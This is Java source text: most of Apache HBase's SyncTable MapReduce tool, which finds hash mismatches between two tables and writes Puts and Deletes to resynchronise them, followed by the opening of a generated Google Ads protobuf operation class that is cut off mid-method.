org.apache.hadoop.hbase.CellBuilderType; import org.apache.hadoop.hbase.CellComparator; import org.apache.hadoop.hbase.CellUtil; import org.apache.hadoop.hbase.HBaseConfiguration; import org.apache.hadoop.hbase.TableName; import org.apache.hadoop.hbase.client.Connection; import org.apache.hadoop.hbase.client.ConnectionFactory; import org.apache.hadoop.hbase.client.Delete; import org.apache.hadoop.hbase.client.Mutation; import org.apache.hadoop.hbase.client.Put; import org.apache.hadoop.hbase.client.Result; import org.apache.hadoop.hbase.client.ResultScanner; import org.apache.hadoop.hbase.client.Scan; import org.apache.hadoop.hbase.client.Table; import org.apache.hadoop.hbase.io.ImmutableBytesWritable; import org.apache.hadoop.hbase.util.Bytes; import org.apache.hadoop.hbase.util.EnvironmentEdgeManager; import org.apache.hadoop.mapreduce.Counters; import org.apache.hadoop.mapreduce.Job; import org.apache.hadoop.mapreduce.lib.output.NullOutputFormat; import org.apache.hadoop.mapreduce.security.TokenCache; import org.apache.hadoop.util.GenericOptionsParser; import org.apache.hadoop.util.Tool; import org.apache.hadoop.util.ToolRunner; import org.apache.yetus.audience.InterfaceAudience; import org.slf4j.Logger; import org.slf4j.LoggerFactory; import org.apache.hbase.thirdparty.com.google.common.base.Throwables; @InterfaceAudience.Private public class SyncTable extends Configured implements Tool { private static final Logger LOG = LoggerFactory.getLogger(SyncTable.class); static final String SOURCE_HASH_DIR_CONF_KEY = "sync.table.source.hash.dir"; static final String SOURCE_TABLE_CONF_KEY = "sync.table.source.table.name"; static final String TARGET_TABLE_CONF_KEY = "sync.table.target.table.name"; static final String SOURCE_URI_CONF_KEY = "sync.table.source.uri"; /** * @deprecated Since 3.0.0, will be removed in 4.0.0 Use {@link #SOURCE_URI_CONF_KEY} instead. */ @Deprecated static final String SOURCE_ZK_CLUSTER_CONF_KEY = "sync.table.source.zk.cluster"; static final String TARGET_URI_CONF_KEY = "sync.table.target.uri"; /** * @deprecated Since 3.0.0, will be removed in 4.0.0 Use {@link #TARGET_URI_CONF_KEY} instead. */ @Deprecated static final String TARGET_ZK_CLUSTER_CONF_KEY = "sync.table.target.zk.cluster"; static final String DRY_RUN_CONF_KEY = "sync.table.dry.run"; static final String DO_DELETES_CONF_KEY = "sync.table.do.deletes"; static final String DO_PUTS_CONF_KEY = "sync.table.do.puts"; static final String IGNORE_TIMESTAMPS = "sync.table.ignore.timestamps"; Path sourceHashDir; String sourceTableName; String targetTableName; URI sourceUri; /** * @deprecated Since 3.0.0, will be removed in 4.0.0 Use {@link #sourceUri} instead. */ @Deprecated String sourceZkCluster; URI targetUri; /** * @deprecated Since 3.0.0, will be removed in 4.0.0 Use {@link #targetUri} instead. */ @Deprecated String targetZkCluster; boolean dryRun; boolean doDeletes = true; boolean doPuts = true; boolean ignoreTimestamps; Counters counters; public SyncTable(Configuration conf) { super(conf); } private void initCredentialsForHBase(String clusterKey, Job job) throws IOException { Configuration peerConf = HBaseConfiguration.createClusterConf(job.getConfiguration(), clusterKey); TableMapReduceUtil.initCredentialsForCluster(job, peerConf); } public Job createSubmittableJob(String[] args) throws IOException { FileSystem fs = sourceHashDir.getFileSystem(getConf()); if (!fs.exists(sourceHashDir)) { throw new IOException("Source hash dir not found: " + sourceHashDir); } Job job = Job.getInstance(getConf(), getConf().get("mapreduce.job.name", "syncTable_" + sourceTableName + "-" + targetTableName)); Configuration jobConf = job.getConfiguration(); if ("kerberos".equalsIgnoreCase(jobConf.get("hadoop.security.authentication"))) { TokenCache.obtainTokensForNamenodes(job.getCredentials(), new Path[] { sourceHashDir }, getConf()); } HashTable.TableHash tableHash = HashTable.TableHash.read(getConf(), sourceHashDir); LOG.info("Read source hash manifest: " + tableHash); LOG.info("Read " + tableHash.partitions.size() + " partition keys"); if (!tableHash.tableName.equals(sourceTableName)) { LOG.warn("Table name mismatch - manifest indicates hash was taken from: " + tableHash.tableName + " but job is reading from: " + sourceTableName); } if (tableHash.numHashFiles != tableHash.partitions.size() + 1) { throw new RuntimeException("Hash data appears corrupt. The number of of hash files created" + " should be 1 more than the number of partition keys. However, the manifest file " + " says numHashFiles=" + tableHash.numHashFiles + " but the number of partition keys" + " found in the partitions file is " + tableHash.partitions.size()); } Path dataDir = new Path(sourceHashDir, HashTable.HASH_DATA_DIR); int dataSubdirCount = 0; for (FileStatus file : fs.listStatus(dataDir)) { if (file.getPath().getName().startsWith(HashTable.OUTPUT_DATA_FILE_PREFIX)) { dataSubdirCount++; } } if (dataSubdirCount != tableHash.numHashFiles) { throw new RuntimeException("Hash data appears corrupt. The number of of hash files created" + " should be 1 more than the number of partition keys. However, the number of data dirs" + " found is " + dataSubdirCount + " but the number of partition keys" + " found in the partitions file is " + tableHash.partitions.size()); } job.setJarByClass(HashTable.class); jobConf.set(SOURCE_HASH_DIR_CONF_KEY, sourceHashDir.toString()); jobConf.set(SOURCE_TABLE_CONF_KEY, sourceTableName); jobConf.set(TARGET_TABLE_CONF_KEY, targetTableName); if (sourceUri != null) { jobConf.set(SOURCE_URI_CONF_KEY, sourceUri.toString()); TableMapReduceUtil.initCredentialsForCluster(job, jobConf, sourceUri); } else if (sourceZkCluster != null) { jobConf.set(SOURCE_ZK_CLUSTER_CONF_KEY, sourceZkCluster); initCredentialsForHBase(sourceZkCluster, job); } if (targetUri != null) { jobConf.set(TARGET_URI_CONF_KEY, targetUri.toString()); TableMapReduceUtil.initCredentialsForCluster(job, jobConf, targetUri); } else if (targetZkCluster != null) { jobConf.set(TARGET_ZK_CLUSTER_CONF_KEY, targetZkCluster); initCredentialsForHBase(targetZkCluster, job); } jobConf.setBoolean(DRY_RUN_CONF_KEY, dryRun); jobConf.setBoolean(DO_DELETES_CONF_KEY, doDeletes); jobConf.setBoolean(DO_PUTS_CONF_KEY, doPuts); jobConf.setBoolean(IGNORE_TIMESTAMPS, ignoreTimestamps); TableMapReduceUtil.initTableMapperJob(targetTableName, tableHash.initScan(), SyncMapper.class, null, null, job); job.setNumReduceTasks(0); if (dryRun) { job.setOutputFormatClass(NullOutputFormat.class); } else { // No reducers. Just write straight to table. Call initTableReducerJob // because it sets up the TableOutputFormat. if (targetUri != null) { TableMapReduceUtil.initTableReducerJob(targetTableName, null, job, null, targetUri); } else { TableMapReduceUtil.initTableReducerJob(targetTableName, null, job, null, targetZkCluster); } // would be nice to add an option for bulk load instead } return job; } public static class SyncMapper extends TableMapper<ImmutableBytesWritable, Mutation> { Path sourceHashDir; Connection sourceConnection; Connection targetConnection; Table sourceTable; Table targetTable; boolean dryRun; boolean doDeletes = true; boolean doPuts = true; boolean ignoreTimestamp; HashTable.TableHash sourceTableHash; HashTable.TableHash.Reader sourceHashReader; ImmutableBytesWritable currentSourceHash; ImmutableBytesWritable nextSourceKey; HashTable.ResultHasher targetHasher; Throwable mapperException; public static enum Counter { BATCHES, HASHES_MATCHED, HASHES_NOT_MATCHED, SOURCEMISSINGROWS, SOURCEMISSINGCELLS, TARGETMISSINGROWS, TARGETMISSINGCELLS, ROWSWITHDIFFS, DIFFERENTCELLVALUES, MATCHINGROWS, MATCHINGCELLS, EMPTY_BATCHES, RANGESMATCHED, RANGESNOTMATCHED } @Override protected void setup(Context context) throws IOException { Configuration conf = context.getConfiguration(); sourceHashDir = new Path(conf.get(SOURCE_HASH_DIR_CONF_KEY)); sourceConnection = openConnection(conf, SOURCE_URI_CONF_KEY, SOURCE_ZK_CLUSTER_CONF_KEY, null); targetConnection = openConnection(conf, TARGET_URI_CONF_KEY, TARGET_ZK_CLUSTER_CONF_KEY, TableOutputFormat.OUTPUT_CONF_PREFIX); sourceTable = openTable(sourceConnection, conf, SOURCE_TABLE_CONF_KEY); targetTable = openTable(targetConnection, conf, TARGET_TABLE_CONF_KEY); dryRun = conf.getBoolean(DRY_RUN_CONF_KEY, false); doDeletes = conf.getBoolean(DO_DELETES_CONF_KEY, true); doPuts = conf.getBoolean(DO_PUTS_CONF_KEY, true); ignoreTimestamp = conf.getBoolean(IGNORE_TIMESTAMPS, false); sourceTableHash = HashTable.TableHash.read(conf, sourceHashDir); LOG.info("Read source hash manifest: " + sourceTableHash); LOG.info("Read " + sourceTableHash.partitions.size() + " partition keys"); TableSplit split = (TableSplit) context.getInputSplit(); ImmutableBytesWritable splitStartKey = new ImmutableBytesWritable(split.getStartRow()); sourceHashReader = sourceTableHash.newReader(conf, splitStartKey); findNextKeyHashPair(); // create a hasher, but don't start it right away // instead, find the first hash batch at or after the start row // and skip any rows that come before. they will be caught by the previous task targetHasher = new HashTable.ResultHasher(); targetHasher.ignoreTimestamps = ignoreTimestamp; } private static Connection openConnection(Configuration conf, String uriConfKey, String zkClusterConfKey, String configPrefix) throws IOException { String uri = conf.get(uriConfKey); if (!StringUtils.isBlank(uri)) { try { return ConnectionFactory.createConnection(new URI(uri), conf); } catch (URISyntaxException e) { throw new IOException( "malformed connection uri: " + uri + ", please check config " + uriConfKey, e); } } else { String zkCluster = conf.get(zkClusterConfKey); Configuration clusterConf = HBaseConfiguration.createClusterConf(conf, zkCluster, configPrefix); return ConnectionFactory.createConnection(clusterConf); } } private static Table openTable(Connection connection, Configuration conf, String tableNameConfKey) throws IOException { return connection.getTable(TableName.valueOf(conf.get(tableNameConfKey))); } /** * Attempt to read the next source key/hash pair. If there are no more, set nextSourceKey to * null */ private void findNextKeyHashPair() throws IOException { boolean hasNext = sourceHashReader.next(); if (hasNext) { nextSourceKey = sourceHashReader.getCurrentKey(); } else { // no more keys - last hash goes to the end nextSourceKey = null; } } @Override protected void map(ImmutableBytesWritable key, Result value, Context context) throws IOException, InterruptedException { try { // first, finish any hash batches that end before the scanned row while (nextSourceKey != null && key.compareTo(nextSourceKey) >= 0) { moveToNextBatch(context); } // next, add the scanned row (as long as we've reached the first batch) if (targetHasher.isBatchStarted()) { targetHasher.hashResult(value); } } catch (Throwable t) { mapperException = t; throw t; } } /** * If there is an open hash batch, complete it and sync if there are diffs. Start a new batch, * and seek to read the */ private void moveToNextBatch(Context context) throws IOException, InterruptedException { if (targetHasher.isBatchStarted()) { finishBatchAndCompareHashes(context); } targetHasher.startBatch(nextSourceKey); currentSourceHash = sourceHashReader.getCurrentHash(); findNextKeyHashPair(); } /** * Finish the currently open hash batch. Compare the target hash to the given source hash. If * they do not match, then sync the covered key range. */ private void finishBatchAndCompareHashes(Context context) throws IOException, InterruptedException { targetHasher.finishBatch(); context.getCounter(Counter.BATCHES).increment(1); if (targetHasher.getBatchSize() == 0) { context.getCounter(Counter.EMPTY_BATCHES).increment(1); } ImmutableBytesWritable targetHash = targetHasher.getBatchHash(); if (targetHash.equals(currentSourceHash)) { context.getCounter(Counter.HASHES_MATCHED).increment(1); } else { context.getCounter(Counter.HASHES_NOT_MATCHED).increment(1); ImmutableBytesWritable stopRow = nextSourceKey == null ? new ImmutableBytesWritable(sourceTableHash.stopRow) : nextSourceKey; if (LOG.isDebugEnabled()) { LOG.debug("Hash mismatch. Key range: " + toHex(targetHasher.getBatchStartKey()) + " to " + toHex(stopRow) + " sourceHash: " + toHex(currentSourceHash) + " targetHash: " + toHex(targetHash)); } syncRange(context, targetHasher.getBatchStartKey(), stopRow); } } private static String toHex(ImmutableBytesWritable bytes) { return Bytes.toHex(bytes.get(), bytes.getOffset(), bytes.getLength()); } private static final CellScanner EMPTY_CELL_SCANNER = new CellScanner(Collections.<Result> emptyIterator()); /** * Rescan the given range directly from the source and target tables. Count and log differences, * and if this is not a dry run, output Puts and Deletes to make the target table match the * source table for this range */ private void syncRange(Context context, ImmutableBytesWritable startRow, ImmutableBytesWritable stopRow) throws IOException, InterruptedException { Scan scan = sourceTableHash.initScan(); scan.withStartRow(startRow.copyBytes()); scan.withStopRow(stopRow.copyBytes()); ResultScanner sourceScanner = sourceTable.getScanner(scan); CellScanner sourceCells = new CellScanner(sourceScanner.iterator()); ResultScanner targetScanner = targetTable.getScanner(new Scan(scan)); CellScanner targetCells = new CellScanner(targetScanner.iterator()); boolean rangeMatched = true; byte[] nextSourceRow = sourceCells.nextRow(); byte[] nextTargetRow = targetCells.nextRow(); while (nextSourceRow != null || nextTargetRow != null) { boolean rowMatched; int rowComparison = compareRowKeys(nextSourceRow, nextTargetRow); if (rowComparison < 0) { if (LOG.isDebugEnabled()) { LOG.debug("Target missing row: " + Bytes.toString(nextSourceRow)); } context.getCounter(Counter.TARGETMISSINGROWS).increment(1); rowMatched = syncRowCells(context, nextSourceRow, sourceCells, EMPTY_CELL_SCANNER); nextSourceRow = sourceCells.nextRow(); // advance only source to next row } else if (rowComparison > 0) { if (LOG.isDebugEnabled()) { LOG.debug("Source missing row: " + Bytes.toString(nextTargetRow)); } context.getCounter(Counter.SOURCEMISSINGROWS).increment(1); rowMatched = syncRowCells(context, nextTargetRow, EMPTY_CELL_SCANNER, targetCells); nextTargetRow = targetCells.nextRow(); // advance only target to next row } else { // current row is the same on both sides, compare cell by cell rowMatched = syncRowCells(context, nextSourceRow, sourceCells, targetCells); nextSourceRow = sourceCells.nextRow(); nextTargetRow = targetCells.nextRow(); } if (!rowMatched) { rangeMatched = false; } } sourceScanner.close(); targetScanner.close(); context.getCounter(rangeMatched ? Counter.RANGESMATCHED : Counter.RANGESNOTMATCHED) .increment(1); } private static class CellScanner { private final Iterator<Result> results; private byte[] currentRow; private Result currentRowResult; private int nextCellInRow; private Result nextRowResult; public CellScanner(Iterator<Result> results) { this.results = results; } /** * Advance to the next row and return its row key. Returns null iff there are no more rows. */ public byte[] nextRow() { if (nextRowResult == null) { // no cached row - check scanner for more while (results.hasNext()) { nextRowResult = results.next(); Cell nextCell = nextRowResult.rawCells()[0]; if ( currentRow == null || !Bytes.equals(currentRow, 0, currentRow.length, nextCell.getRowArray(), nextCell.getRowOffset(), nextCell.getRowLength()) ) { // found next row break; } else { // found another result from current row, keep scanning nextRowResult = null; } } if (nextRowResult == null) { // end of data, no more rows currentRowResult = null; currentRow = null; return null; } } // advance to cached result for next row currentRowResult = nextRowResult; nextCellInRow = 0; currentRow = currentRowResult.getRow(); nextRowResult = null; return currentRow; } /** * Returns the next Cell in the current row or null iff none remain. */ public Cell nextCellInRow() { if (currentRowResult == null) { // nothing left in current row return null; } Cell nextCell = currentRowResult.rawCells()[nextCellInRow]; nextCellInRow++; if (nextCellInRow == currentRowResult.size()) { if (results.hasNext()) { Result result = results.next(); Cell cell = result.rawCells()[0]; if ( Bytes.equals(currentRow, 0, currentRow.length, cell.getRowArray(), cell.getRowOffset(), cell.getRowLength()) ) { // result is part of current row currentRowResult = result; nextCellInRow = 0; } else { // result is part of next row, cache it nextRowResult = result; // current row is complete currentRowResult = null; } } else { // end of data currentRowResult = null; } } return nextCell; } } private Cell checkAndResetTimestamp(Cell sourceCell) { if (ignoreTimestamp) { sourceCell = CellBuilderFactory.create(CellBuilderType.SHALLOW_COPY).setType(sourceCell.getType()) .setRow(sourceCell.getRowArray(), sourceCell.getRowOffset(), sourceCell.getRowLength()) .setFamily(sourceCell.getFamilyArray(), sourceCell.getFamilyOffset(), sourceCell.getFamilyLength()) .setQualifier(sourceCell.getQualifierArray(), sourceCell.getQualifierOffset(), sourceCell.getQualifierLength()) .setTimestamp(EnvironmentEdgeManager.currentTime()).setValue(sourceCell.getValueArray(), sourceCell.getValueOffset(), sourceCell.getValueLength()) .build(); } return sourceCell; } /** * Compare the cells for the given row from the source and target tables. Count and log any * differences. If not a dry run, output a Put and/or Delete needed to sync the target table to * match the source table. */ private boolean syncRowCells(Context context, byte[] rowKey, CellScanner sourceCells, CellScanner targetCells) throws IOException, InterruptedException { Put put = null; Delete delete = null; long matchingCells = 0; boolean matchingRow = true; Cell sourceCell = sourceCells.nextCellInRow(); Cell targetCell = targetCells.nextCellInRow(); while (sourceCell != null || targetCell != null) { int cellKeyComparison = compareCellKeysWithinRow(sourceCell, targetCell); if (cellKeyComparison < 0) { if (LOG.isDebugEnabled()) { LOG.debug("Target missing cell: " + sourceCell); } context.getCounter(Counter.TARGETMISSINGCELLS).increment(1); matchingRow = false; if (!dryRun && doPuts) { if (put == null) { put = new Put(rowKey); } sourceCell = checkAndResetTimestamp(sourceCell); put.add(sourceCell); } sourceCell = sourceCells.nextCellInRow(); } else if (cellKeyComparison > 0) { if (LOG.isDebugEnabled()) { LOG.debug("Source missing cell: " + targetCell); } context.getCounter(Counter.SOURCEMISSINGCELLS).increment(1); matchingRow = false; if (!dryRun && doDeletes) { if (delete == null) { delete = new Delete(rowKey); } // add a tombstone to exactly match the target cell that is missing on the source delete.addColumn(CellUtil.cloneFamily(targetCell), CellUtil.cloneQualifier(targetCell), targetCell.getTimestamp()); } targetCell = targetCells.nextCellInRow(); } else { // the cell keys are equal, now check values if (CellUtil.matchingValue(sourceCell, targetCell)) { matchingCells++; } else { if (LOG.isDebugEnabled()) { LOG.debug("Different values: "); LOG.debug(" source cell: " + sourceCell + " value: " + Bytes.toString(sourceCell.getValueArray(), sourceCell.getValueOffset(), sourceCell.getValueLength())); LOG.debug(" target cell: " + targetCell + " value: " + Bytes.toString(targetCell.getValueArray(), targetCell.getValueOffset(), targetCell.getValueLength())); } context.getCounter(Counter.DIFFERENTCELLVALUES).increment(1); matchingRow = false; if (!dryRun && doPuts) { // overwrite target cell if (put == null) { put = new Put(rowKey); } sourceCell = checkAndResetTimestamp(sourceCell); put.add(sourceCell); } } sourceCell = sourceCells.nextCellInRow(); targetCell = targetCells.nextCellInRow(); } if (!dryRun && sourceTableHash.scanBatch > 0) { if (put != null && put.size() >= sourceTableHash.scanBatch) { context.write(new ImmutableBytesWritable(rowKey), put); put = null; } if (delete != null && delete.size() >= sourceTableHash.scanBatch) { context.write(new ImmutableBytesWritable(rowKey), delete); delete = null; } } } if (!dryRun) { if (put != null) { context.write(new ImmutableBytesWritable(rowKey), put); } if (delete != null) { context.write(new ImmutableBytesWritable(rowKey), delete); } } if (matchingCells > 0) { context.getCounter(Counter.MATCHINGCELLS).increment(matchingCells); } if (matchingRow) { context.getCounter(Counter.MATCHINGROWS).increment(1); return true; } else { context.getCounter(Counter.ROWSWITHDIFFS).increment(1); return false; } } /** * Compare row keys of the given Result objects. Nulls are after non-nulls */ private static int compareRowKeys(byte[] r1, byte[] r2) { if (r1 == null) { return 1; // source missing row } else if (r2 == null) { return -1; // target missing row } else { // Sync on no META tables only. We can directly do what CellComparator is doing inside. // Never the call going to MetaCellComparator. return Bytes.compareTo(r1, 0, r1.length, r2, 0, r2.length); } } /** * Compare families, qualifiers, and timestamps of the given Cells. They are assumed to be of * the same row. Nulls are after non-nulls. */ private int compareCellKeysWithinRow(Cell c1, Cell c2) { if (c1 == null) { return 1; // source missing cell } if (c2 == null) { return -1; // target missing cell } int result = CellComparator.getInstance().compareFamilies(c1, c2); if (result != 0) { return result; } result = CellComparator.getInstance().compareQualifiers(c1, c2); if (result != 0) { return result; } if (this.ignoreTimestamp) { return 0; } else { // note timestamp comparison is inverted - more recent cells first return CellComparator.getInstance().compareTimestamps(c1, c2); } } @Override protected void cleanup(Context context) throws IOException, InterruptedException { if (mapperException == null) { try { finishRemainingHashRanges(context); } catch (Throwable t) { mapperException = t; } } try { sourceTable.close(); targetTable.close(); sourceConnection.close(); targetConnection.close(); } catch (Throwable t) { if (mapperException == null) { mapperException = t; } else { LOG.error("Suppressing exception from closing tables", t); } } // propagate first exception if (mapperException != null) { Throwables.throwIfInstanceOf(mapperException, IOException.class); Throwables.throwIfInstanceOf(mapperException, InterruptedException.class); Throwables.throwIfUnchecked(mapperException); } } private void finishRemainingHashRanges(Context context) throws IOException, InterruptedException { TableSplit split = (TableSplit) context.getInputSplit(); byte[] splitEndRow = split.getEndRow(); boolean reachedEndOfTable = HashTable.isTableEndRow(splitEndRow); // if there are more hash batches that begin before the end of this split move to them while ( nextSourceKey != null && (nextSourceKey.compareTo(splitEndRow) < 0 || reachedEndOfTable) ) { moveToNextBatch(context); } if (targetHasher.isBatchStarted()) { // need to complete the final open hash batch if ( (nextSourceKey != null && nextSourceKey.compareTo(splitEndRow) > 0) || (nextSourceKey == null && !Bytes.equals(splitEndRow, sourceTableHash.stopRow)) ) { // the open hash range continues past the end of this region // add a scan to complete the current hash range Scan scan = sourceTableHash.initScan(); scan.withStartRow(splitEndRow); if (nextSourceKey == null) { scan.withStopRow(sourceTableHash.stopRow); } else { scan.withStopRow(nextSourceKey.copyBytes()); } ResultScanner targetScanner = null; try { targetScanner = targetTable.getScanner(scan); for (Result row : targetScanner) { targetHasher.hashResult(row); } } finally { if (targetScanner != null) { targetScanner.close(); } } } // else current batch ends exactly at split end row finishBatchAndCompareHashes(context); } } } private static final int NUM_ARGS = 3; private static void printUsage(final String errorMsg) { if (errorMsg != null && errorMsg.length() > 0) { System.err.println("ERROR: " + errorMsg); System.err.println(); } System.err.println("Usage: SyncTable [options] <sourcehashdir> <sourcetable> <targettable>"); System.err.println(); System.err.println("Options:"); System.err.println(" sourceuri Cluster connection uri of the source table"); System.err.println(" (defaults to cluster in classpath's config)"); System.err.println(" sourcezkcluster ZK cluster key of the source table"); System.err.println(" (defaults to cluster in classpath's config)"); System.err.println(" Do not take effect if sourceuri is specified"); System.err.println(" Deprecated, please use sourceuri instead"); System.err.println(" targeturi Cluster connection uri of the target table"); System.err.println(" (defaults to cluster in classpath's config)"); System.err.println(" targetzkcluster ZK cluster key of the target table"); System.err.println(" (defaults to cluster in classpath's config)"); System.err.println(" Do not take effect if targeturi is specified"); System.err.println(" Deprecated, please use targeturi instead"); System.err.println(" dryrun if true, output counters but no writes"); System.err.println(" (defaults to false)"); System.err.println(" doDeletes if false, does not perform deletes"); System.err.println(" (defaults to true)"); System.err.println(" doPuts if false, does not perform puts"); System.err.println(" (defaults to true)"); System.err.println(" ignoreTimestamps if true, ignores cells timestamps while comparing "); System.err.println(" cell values. Any missing cell on target then gets"); System.err.println(" added with current time as timestamp "); System.err.println(" (defaults to false)"); System.err.println(); System.err.println("Args:"); System.err.println(" sourcehashdir path to HashTable output dir for source table"); System.err.println(" (see org.apache.hadoop.hbase.mapreduce.HashTable)"); System.err.println(" sourcetable Name of the source table to sync from"); System.err.println(" targettable Name of the target table to sync to"); System.err.println(); System.err.println("Examples:"); System.err.println(" For a dry run SyncTable of tableA from a remote source cluster"); System.err.println(" to a local target cluster:"); System.err.println(" $ hbase " + "org.apache.hadoop.hbase.mapreduce.SyncTable --dryrun=true" + " --sourcezkcluster=zk1.example.com,zk2.example.com,zk3.example.com:2181:/hbase" + " hdfs://nn:9000/hashes/tableA tableA tableA"); } private boolean doCommandLine(final String[] args) { if (args.length < NUM_ARGS) { printUsage(null); return false; } try { sourceHashDir = new Path(args[args.length - 3]); sourceTableName = args[args.length - 2]; targetTableName = args[args.length - 1]; for (int i = 0; i < args.length - NUM_ARGS; i++) { String cmd = args[i]; if (cmd.equals("-h") || cmd.startsWith("--h")) { printUsage(null); return false; } final String sourceUriKey = "--sourceuri="; if (cmd.startsWith(sourceUriKey)) { sourceUri = new URI(cmd.substring(sourceUriKey.length())); continue; } final String sourceZkClusterKey = "--sourcezkcluster="; if (cmd.startsWith(sourceZkClusterKey)) { sourceZkCluster = cmd.substring(sourceZkClusterKey.length()); continue; } final String targetUriKey = "--targeturi="; if (cmd.startsWith(targetUriKey)) { targetUri = new URI(cmd.substring(targetUriKey.length())); continue; } final String targetZkClusterKey = "--targetzkcluster="; if (cmd.startsWith(targetZkClusterKey)) { targetZkCluster = cmd.substring(targetZkClusterKey.length()); continue; } final String dryRunKey = "--dryrun="; if (cmd.startsWith(dryRunKey)) { dryRun = Boolean.parseBoolean(cmd.substring(dryRunKey.length())); continue; } final String doDeletesKey = "--doDeletes="; if (cmd.startsWith(doDeletesKey)) { doDeletes = Boolean.parseBoolean(cmd.substring(doDeletesKey.length())); continue; } final String doPutsKey = "--doPuts="; if (cmd.startsWith(doPutsKey)) { doPuts = Boolean.parseBoolean(cmd.substring(doPutsKey.length())); continue; } final String ignoreTimestampsKey = "--ignoreTimestamps="; if (cmd.startsWith(ignoreTimestampsKey)) { ignoreTimestamps = Boolean.parseBoolean(cmd.substring(ignoreTimestampsKey.length())); continue; } printUsage("Invalid argument '" + cmd + "'"); return false; } } catch (Exception e) { LOG.error("Failed to parse commandLine arguments", e); printUsage("Can't start because " + e.getMessage()); return false; } return true; } /** * Main entry point. */ public static void main(String[] args) throws Exception { int ret = ToolRunner.run(new SyncTable(HBaseConfiguration.create()), args); System.exit(ret); } @Override public int run(String[] args) throws Exception { String[] otherArgs = new GenericOptionsParser(getConf(), args).getRemainingArgs(); if (!doCommandLine(otherArgs)) { return 1; } Job job = createSubmittableJob(otherArgs); if (!job.waitForCompletion(true)) { LOG.info("Map-reduce job failed!"); return 1; } counters = job.getCounters(); return 0; } }
googleads/google-ads-java
35,941
google-ads-stubs-v19/src/main/java/com/google/ads/googleads/v19/services/CampaignConversionGoalOperation.java
// Generated by the protocol buffer compiler. DO NOT EDIT! // source: google/ads/googleads/v19/services/campaign_conversion_goal_service.proto // Protobuf Java Version: 3.25.7 package com.google.ads.googleads.v19.services; /** * <pre> * A single operation (update) on a campaign conversion goal. * </pre> * * Protobuf type {@code google.ads.googleads.v19.services.CampaignConversionGoalOperation} */ public final class CampaignConversionGoalOperation extends com.google.protobuf.GeneratedMessageV3 implements // @@protoc_insertion_point(message_implements:google.ads.googleads.v19.services.CampaignConversionGoalOperation) CampaignConversionGoalOperationOrBuilder { private static final long serialVersionUID = 0L; // Use CampaignConversionGoalOperation.newBuilder() to construct. private CampaignConversionGoalOperation(com.google.protobuf.GeneratedMessageV3.Builder<?> builder) { super(builder); } private CampaignConversionGoalOperation() { } @java.lang.Override @SuppressWarnings({"unused"}) protected java.lang.Object newInstance( UnusedPrivateParameter unused) { return new CampaignConversionGoalOperation(); } public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.ads.googleads.v19.services.CampaignConversionGoalServiceProto.internal_static_google_ads_googleads_v19_services_CampaignConversionGoalOperation_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.ads.googleads.v19.services.CampaignConversionGoalServiceProto.internal_static_google_ads_googleads_v19_services_CampaignConversionGoalOperation_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.ads.googleads.v19.services.CampaignConversionGoalOperation.class, com.google.ads.googleads.v19.services.CampaignConversionGoalOperation.Builder.class); } private int bitField0_; private int operationCase_ = 0; @SuppressWarnings("serial") private java.lang.Object operation_; public enum OperationCase implements com.google.protobuf.Internal.EnumLite, com.google.protobuf.AbstractMessage.InternalOneOfEnum { UPDATE(1), OPERATION_NOT_SET(0); private final int value; private OperationCase(int value) { this.value = value; } /** * @param value The number of the enum to look for. * @return The enum associated with the given number. * @deprecated Use {@link #forNumber(int)} instead. */ @java.lang.Deprecated public static OperationCase valueOf(int value) { return forNumber(value); } public static OperationCase forNumber(int value) { switch (value) { case 1: return UPDATE; case 0: return OPERATION_NOT_SET; default: return null; } } public int getNumber() { return this.value; } }; public OperationCase getOperationCase() { return OperationCase.forNumber( operationCase_); } public static final int UPDATE_MASK_FIELD_NUMBER = 2; private com.google.protobuf.FieldMask updateMask_; /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> * @return Whether the updateMask field is set. */ @java.lang.Override public boolean hasUpdateMask() { return ((bitField0_ & 0x00000001) != 0); } /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> * @return The updateMask. */ @java.lang.Override public com.google.protobuf.FieldMask getUpdateMask() { return updateMask_ == null ? com.google.protobuf.FieldMask.getDefaultInstance() : updateMask_; } /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> */ @java.lang.Override public com.google.protobuf.FieldMaskOrBuilder getUpdateMaskOrBuilder() { return updateMask_ == null ? com.google.protobuf.FieldMask.getDefaultInstance() : updateMask_; } public static final int UPDATE_FIELD_NUMBER = 1; /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v19.resources.CampaignConversionGoal update = 1;</code> * @return Whether the update field is set. */ @java.lang.Override public boolean hasUpdate() { return operationCase_ == 1; } /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v19.resources.CampaignConversionGoal update = 1;</code> * @return The update. */ @java.lang.Override public com.google.ads.googleads.v19.resources.CampaignConversionGoal getUpdate() { if (operationCase_ == 1) { return (com.google.ads.googleads.v19.resources.CampaignConversionGoal) operation_; } return com.google.ads.googleads.v19.resources.CampaignConversionGoal.getDefaultInstance(); } /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v19.resources.CampaignConversionGoal update = 1;</code> */ @java.lang.Override public com.google.ads.googleads.v19.resources.CampaignConversionGoalOrBuilder getUpdateOrBuilder() { if (operationCase_ == 1) { return (com.google.ads.googleads.v19.resources.CampaignConversionGoal) operation_; } return com.google.ads.googleads.v19.resources.CampaignConversionGoal.getDefaultInstance(); } private byte memoizedIsInitialized = -1; @java.lang.Override public final boolean isInitialized() { byte isInitialized = memoizedIsInitialized; if (isInitialized == 1) return true; if (isInitialized == 0) return false; memoizedIsInitialized = 1; return true; } @java.lang.Override public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { if (operationCase_ == 1) { output.writeMessage(1, (com.google.ads.googleads.v19.resources.CampaignConversionGoal) operation_); } if (((bitField0_ & 0x00000001) != 0)) { output.writeMessage(2, getUpdateMask()); } getUnknownFields().writeTo(output); } @java.lang.Override public int getSerializedSize() { int size = memoizedSize; if (size != -1) return size; size = 0; if (operationCase_ == 1) { size += com.google.protobuf.CodedOutputStream 